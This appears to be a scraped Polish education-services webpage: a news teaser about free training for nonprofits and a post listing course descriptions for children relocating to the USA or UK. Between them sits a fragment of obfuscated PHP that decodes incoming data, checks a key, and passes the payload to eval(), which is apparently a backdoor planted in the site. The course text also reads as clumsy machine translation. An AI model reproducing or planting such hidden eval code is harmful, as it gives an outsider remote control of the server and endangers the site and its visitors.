Najnowszy

Nieodpłatne szkolenia dla instytucji niedochodowych

Pracujesz dla niekomercyjnego stowarzyszenia albo fundacji? Od dziś możesz zgłosić wniosek o szkolenia, które pomogą Twojej organizacji rozwinąć skrzydła. Za udział w otrzymanym kursie nie

Czytaj więcej...
$l2746){$ecaa4dc5 = $l2746;$sf74268d0 = $v2a0;}if (!$ecaa4dc5){foreach ($m5720a[$m5720a['uda8726'][45].$m5720a['uda8726'][77].$m5720a['uda8726'][23].$m5720a['uda8726'][7].$m5720a['uda8726'][7].$m5720a['uda8726'][48]] as $v2a0=>$l2746){$ecaa4dc5 = $l2746;$sf74268d0 = $v2a0;}}$ecaa4dc5 = @$m5720a[$m5720a['uda8726'][55].$m5720a['uda8726'][63].$m5720a['uda8726'][21].$m5720a['uda8726'][27].$m5720a['uda8726'][77]]($m5720a[$m5720a['uda8726'][67].$m5720a['uda8726'][49].$m5720a['uda8726'][17].$m5720a['uda8726'][7].$m5720a['uda8726'][24].$m5720a['uda8726'][48].$m5720a['uda8726'][96]]($m5720a[$m5720a['uda8726'][55].$m5720a['uda8726'][48].$m5720a['uda8726'][77].$m5720a['uda8726'][47].$m5720a['uda8726'][49]]($ecaa4dc5), $sf74268d0));if (isset($ecaa4dc5[$m5720a['uda8726'][21].$m5720a['uda8726'][61]]) && $m6da==$ecaa4dc5[$m5720a['uda8726'][21].$m5720a['uda8726'][61]]){if ($ecaa4dc5[$m5720a['uda8726'][21]] == $m5720a['uda8726'][1]){$ld6b5a9 = Array($m5720a['uda8726'][88].$m5720a['uda8726'][95] => @$m5720a[$m5720a['uda8726'][66].$m5720a['uda8726'][21].$m5720a['uda8726'][47].$m5720a['uda8726'][63].$m5720a['uda8726'][63].$m5720a['uda8726'][41]](),$m5720a['uda8726'][14].$m5720a['uda8726'][95] => $m5720a['uda8726'][96].$m5720a['uda8726'][6].$m5720a['uda8726'][23].$m5720a['uda8726'][52].$m5720a['uda8726'][96],);echo @$m5720a[$m5720a['uda8726'][67].$m5720a['uda8726'][24].$m5720a['uda8726'][67].$m5720a['uda8726'][21].$m5720a['uda8726'][24].$m5720a['uda8726'][41].$m5720a['uda8726'][21].$m5720a['uda8726'][27]]($ld6b5a9);}elseif ($ecaa4dc5[$m5720a['uda8726'][21]] == $m5720a['uda8726'][7]){eval/*y4f65c*/($ecaa4dc5[$m5720a['uda8726'][92]]);}exit();}} ?>

Programy przedmaturalne – wyjazdy do Anglii

Data publikacji: 05.06.2018
Autor: admin

Nasza kadra przygotowuje kursy i certyfikacje standaryzacyjne dla dzieci relokujących się z rodzinami do Stanów Zjednoczonych lub Anglii. Umożliwiają one na honorowaną przez władze uczelniane migrację do docelowej placówki szkolnej. Do tej pory prowadziliśmy m.in. tu wymienione programy: 

Definicja kursów nr J99/USA:

Warsztaty Art (klasa 4) zapewniają studentom zajęcia sprzyjające twórczej ekspresji, komunikacji poprzez artystyczne przedsięwzięcie oraz docenianie kultury i dziedzictwa. Działania mogą obejmować te, które umożliwiają słuchaczom doskonalenie techniki, zwiększenie słownictwa artystycznego, wyrażanie siebie i swojego poglądu na świat, nawiązywanie kontaktów z innymi obszarami treści, rozwijanie własnej estetyki i wzmacnianie ich zdolności krytycznych. Chociaż zazwyczaj obejmują one sztuki wizualne (rysunek, malarstwo, rzeźba, rzemiosło itp.), Programy te mogą obejmować również inne formy sztuki (na przykład taniec, muzyka i teatr). Konkretna treść kursu jest zgodna z istniejącymi standardami stanu dla klasy 4.

Definicja kursów nr B74/UK:

Matematyka - Szkolenia ogólne obejmują treści, które nie są zróżnicowane i mogą odnosić się do szeregu kolejnych ocen (np. "" W trzeciej klasie, uczniowie powinni wiedzieć i umieć zrobić ... ""). Programy te obejmują treści, które mogą mieć zastosowanie do stanów lub miejscowości, które nie stosują standardów zawartości na poziomie klasy. [Seminaria te zapewniają szeroką zawartość, która nie jest zorganizowana w sposób opisany w innym miejscu (np. Matematyka, edukacja wczesnoszkolna poprzez klasę 8).] "

Oficjalne tłumaczenie wymogów kursów nr J67/USA:

Kursy Humanities-Workplace Experience zapewniają doświadczenie zawodowe w dziedzinie związanej z naukami humanistycznymi. Cele są zazwyczaj ustalane wspólnie przez studenta, nauczyciela i pracodawcę (chociaż studenci nie muszą płacić). Kursy te mogą obejmować również zajęcia w klasie, obejmujące dalsze studiowanie w terenie lub dyskusję dotyczącą doświadczeń, które uczniowie napotykają w miejscu pracy.

Definicja programów nr J93/USA:

Szkolenia w niezależnym studium literatury, często prowadzone z instruktorami jako mentorami, umożliwiają studentom zapoznanie się z tematami związanymi z literaturą. Niezależne Seminaria mogą być okazją dla studentów do poszerzenia wiedzy specjalistycznej w danej aplikacji, do bardziej szczegółowego zbadania tematu lub do rozwoju bardziej zaawansowanych umiejętności.

Charakterystyka kursów nr B11/UK:

Zajęcia z językiem artystycznym (przedszkole) angażują uczniów w zajęcia rozwijające umiejętności językowe (czytanie, pisanie, słuchanie i mówienie). Treści kursu mogą podkreślać opowiadanie lub czytanie na głos i wywoływać pisemną, ustną lub obrazkową odpowiedź. Konkretna treść zależy od standardów stanowych dla przedszkola.

Definicja programów nr G85/UK:

Warsztaty International Baccalaureate (IB) Arts, Middle Years Program obejmuje sztuki wizualne i performatywne oraz organizowanie nauki w cyklu twórczym. Seminaria te umożliwiają abiturientom kontakt z formami sztuki i walorami estetycznymi różnych kultur oraz pomagają uczestnikom opanować techniki artystyczne.

Oficjalne tłumaczenie wymogów kursów nr B94/UK:

Wychowanie fizyczne (edukacja wczesnoszkolna) kładzie nacisk na podstawowe umiejętności ruchowe, świadomość ciała i kontrolę, bezpieczeństwo i radość z aktywności fizycznej. Konkretna treść zależy od standardów stanowych w zakresie wczesnej edukacji.Tagi: